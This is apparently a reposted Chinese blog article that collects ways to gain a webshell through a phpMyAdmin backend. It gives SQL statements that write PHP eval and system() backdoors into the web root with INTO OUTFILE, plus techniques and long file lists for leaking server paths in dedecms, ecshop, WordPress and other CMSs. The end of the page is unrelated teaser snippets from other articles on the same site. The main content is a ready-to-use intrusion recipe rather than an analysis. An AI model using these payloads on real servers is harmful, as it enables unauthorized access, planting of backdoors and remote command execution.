在phpmyadmin后台获取webshell方法汇总整理

方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同一时候运行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接password:xiaoma


方法二:
 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
 select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
 Drop TABLE IF EXISTS xiaoma;


方法三:


读取文件内容:    select load_file('E:/xamp/www/s.php');


写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'


cmd运行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'




方法四:
 select load_file('E:/xamp/www/xiaoma.php');


 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

 然后訪问站点文件夹:http://www.xxxx.com/xiaoma.php?cmd=dir


php爆路径方法收集 :

1、单引號爆路径
说明:
直接在URL后面加单引號,要求单引號没有被过滤(gpc=off)且server默认返回错误信息。
www.xxx.com/news.php?id=149′


2、错误參数值爆路径
说明:
将要提交的參数值改成错误值,比方-1。-99999单引號被过滤时最好还是试试。
www.xxx.com/researcharchive.php?id=-1


3、Google爆路径
说明:
结合keyword和site语法搜索出错页面的网页快照,常见keyword有warning和fatal error。注意,假设目标网站是二级域名,site接的是其相应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”


4、測试文件爆路径
说明:
非常多站点的根文件夹下都存在測试文件,脚本代码通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php


5、phpmyadmin爆路径
说明:
一旦找到phpmyadmin的管理页面,再訪问该文件夹下的某些特定文件,就非常有可能爆出物理路径。至于phpmyadmin的地址能够用wwwscan这类的工具去扫,也能够选择google。PS:有些BT站点会写成phpMyAdmin。
1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php


6、配置文件找路径
说明:
假设注入点有文件读取权限,就能够手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Webserver和PHP的配置文件默认路径能够上网查,这里列举常见的几个。


Windows:
c:\windows\php.ini                                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml              IIS虚拟主机配置文件


Linux:
/etc/php.ini                                           php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf                             Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf         虚拟文件夹配置文件


7、nginx文件类型错误解析爆路径
说明:
这是昨天无意中发现的方法,当然要求Webserver是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件运行,还有可能爆出物理路径。
www.xxx.com/top.jpg/x.php


8、其它
dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php 
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php


WP
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php


ecshop商城系统暴路径漏洞文件
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php


ucenter爆路径
ucenter\control\admin\db.php


DZbbs
manyou/admincp.php?my_suffix=%0A%0DTOBY57


z-blog
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php


php168爆路径
admin/inc/hack/count.php?job=list
admin/inc/hack/search.php?job=getcode
admin/inc/ajax/bencandy.php?job=do
cache/MysqlTime.txt


PHPcms2008-sp4
注冊用户登陆后訪问
phpcms/corpandresize/process.php?pic=../images/logo.gif


bo-blog
PoC:
/go.php/<[evil code]
CMSeasy爆站点路径漏洞
漏洞出如今menu_top.php这个文件里
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/298026.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

matlab一维插值extrap,matlab二维插值

介绍griddata及interp2算法matlab二维插值--interp2与griddata from:matlab功能强大&#xff0c;以至于不知道他不能做什么&#xff0c;只是怨自己没有找到相应的函数。 二者均是常用的二维差值方法&#xff0c;两者的区别是&#xff0c;interp2的插值数据必须是矩形域&#xf…

操作系统概念 ppt_智能家居操作系统三国拉锯,要出结果了吗?

海尔、百度、华为盘踞的智能家居操作系统&#xff0c;谁拿下传统家电企业了&#xff1f;文/郭锴来源/智能相对论(aixdlun)福特曾说&#xff0c;如果你问消费者他们想要什么&#xff0c;得到的答案只会是一匹更快的马。汽车大王福特给消费者了汽车&#xff0c;手机教父乔布斯拿出…

垃圾站

http://www.heiqu.com/

阿拉伯数字转成大写

function NoToChinese(num) {if (!/^\d*(\.\d*)?$/.test(num)) {alert("Number is wrong!"); return "Number is wrong!"; } var AA new Array("零", "壹", "贰", "叁", "肆", "伍", "…

史上超强的学科碰撞,有生之年必看系列!

▲ 点击查看 马云在一次演讲中&#xff0c;说过这样一段话&#xff1a;现今社会&#xff0c;如果我们继续以前的教学方法对我们的孩子进行记、背、算这些东西&#xff0c;不让孩子去体验&#xff0c;去玩&#xff0c;不让他们去尝试琴棋书画。我可以保证&#xff1a;三十年后孩…

《那些年啊,那些事——一个程序员的奋斗史》——35

段伏枥好不容易搞明白窗口创建的流程之后&#xff0c;接下来的事情&#xff0c;倒是让他发愁了。UI界面肯定不止是一个界面那么简单&#xff0c;还有什么背光设置啊&#xff0c;多媒体之类&#xff0c;那这些应该如何组织呢&#xff1f;之前段伏枥的做法&#xff0c;是将所有的…

php如果字符串有1 3 5,PHP常用字符串函数小结

PHP常用字符串函数小结来源&#xff1a;程序员人生 发布时间&#xff1a;2015-01-22 09:02:32 阅读次数&#xff1a;1594次1、判断类型的函数is_bool() //判断是不是为布尔型is_float() //判断是不是为浮点型is_real() //同上is_int() //判断是不是为整型is_integer() //同上…

使用zipKin构建NetCore分布式链路跟踪

本文主要讲解使用ZipKin构建NetCore分布式链路跟踪场景因为最近公司业务量增加&#xff0c;而项目也需要增大部署数量&#xff0c;K8S中Pod基本都扩容了一倍&#xff0c;新增了若干物理机&#xff0c;部分物理机网络通信存在问题&#xff0c;导致部分请求打入有问题的物理机时总…

micropython 网络驱动_network_网卡驱动

# network _视频 (import network)network 用于初始化各种网卡驱动*****## **构造函数&#xff1a;*** [ ] **播录视频**class network.ESP8285(uart)>初始化ESP8285&#xff0c;构造一个ESP8285网卡对象&#xff0c;使用需要传入一个uart对象*参数&#xff1a;** uart: 与A…

工作心得

各位朋友大家好&#xff1a;今天很高兴可以和大家对于工作的经验方面发表一些自己的看法&#xff0c;希望能对大家有所帮助&#xff0c;也希望和大家多交流交流&#xff0c;对此说一下这7年来参加工作后的一些体会&#xff0c;如有不对之处&#xff0c;还请大家指出&#xff0c…

matlab 抽样判决代码,matlab抽样判决器

低通 滤波器 LPF 用于滤除高频分量,提高信噪比;抽样判决所需的同步时钟需要从...通信原理 MATLAB 仿真实验 基于 MATLAB 的第一类部分响应系统的 基带信号及其眼图...这种方法具体做法是:用一个示波器跨接在抽样判决器的输入端,然后调整示波 器......(经抽样判决器解调信号波形…

微信又添新功能!这个微信群可以学英语,而且全程免费

全世界只有3.14 % 的人关注了爆炸吧知识最近不少网友发现&#xff0c;在微信群里居然可以学英语&#xff01;而且全程免费&#xff01;群里面会有免费的英语直播课&#xff0c;免费的课程资料&#xff0c;还有专业的英语老师辅导学习。 更重要的是&#xff0c;不需要集赞&#…

C# winform 窗体接收命令行参数自动登录进行系统,模拟600个WCF客户端的并发压力测试...

我们想要达到的目的是模拟&#xff16;&#xff10;&#xff10;个客户端的消息提醒功能&#xff0c;当然我们没有&#xff16;&#xff10;&#xff10;个电脑可以拿来测试&#xff0c;我们只有&#xff14;&#xff0d;&#xff15;台电脑可以用来测试&#xff0c;那我们就想…

UpdatePanel的用法

UpdatePanel控件也是Ajax里用得最多的控件之中的一个&#xff0c;UpdatePanel控件是用来局部更新网页上的内容&#xff0c;网页上要局部更新的内容必须放在UpdatePanel控件里&#xff0c;他必须和上一次说的ScriptManager控件一起使用。如今来看UpdatePanel的属性UpdatePanel重…

JMeter压测笔记

每个资深测试工程师&#xff0c;必须掌握的测试工具&#xff0c;熟练使用Jmeter能大大提高工作效率。熟练使用Jmeter后&#xff0c; 能用Jmeter搞定的事情&#xff0c;你就不会使用LoadRunner了。Jmeter 是一款使用Java开发的&#xff0c;开源免费的&#xff0c;测试工具&#…

系统同传软件_如何戴耳机录制自己的同传练习?

在学校上课的话&#xff0c;有同传实验室的模拟会议系统可以完成同传的录制&#xff0c;但是自己的练习的时候就会出现录制的问题。曾经在一次导专课上遇到过这种尴尬&#xff0c;由于需要将自己的同传练习录音分享给老师和同学听&#xff0c;所以就要把源语和译入语都录制下来…

颜宁课题组再发Cell!1个月时间内4篇顶刊!

全世界只有3.14 % 的人关注了爆炸吧知识本文来源&#xff1a;iNature&#xff08;作者&#xff1a;枫叶&#xff09;、微博转自&#xff1a;募格学术6月15日晚&#xff0c;颜宁团队和新南威尔士大学杨洪远团队合作&#xff0c;在Cell 《细胞》在线发表了题为“Structural Basis…

C# 中打印、预览、打印机设置和打印属性的方法

private void Form1_Load(object sender, System.EventArgs e){//获取或设置一个值&#xff0c;该值指示是否发送到文件或端口printDocument1.PrinterSettings.PrintToFile true;//设置打印时横向还是纵向printDocument1.DefaultPageSettings.Landscape true;}private void f…

lua传值到php,使用lua实现php的var_dump()函数功能

习惯了php中的var_dump()函数&#xff0c;而如今写lua的时候总习惯使用var_dump()函数&#xff0c;于是就自己动手写了一个类似功能的var_dump()函数。复制代码 代码如下:function var_dump(data, max_level, prefix)if type(prefix) ~ "string" thenprefix "&…

BOOST 线程完全攻略 - 结束语

2019独角兽企业重金招聘Python工程师标准>>> 全文介绍了3个boost::thread的扩展类&#xff0c;希望能给大家书写多线程代码带来便捷。 thread -> controlled_module_ex ->controlled_module 那么我们具体在什么情况下选用不同的扩展类呢&#xff1f; 1.如果你…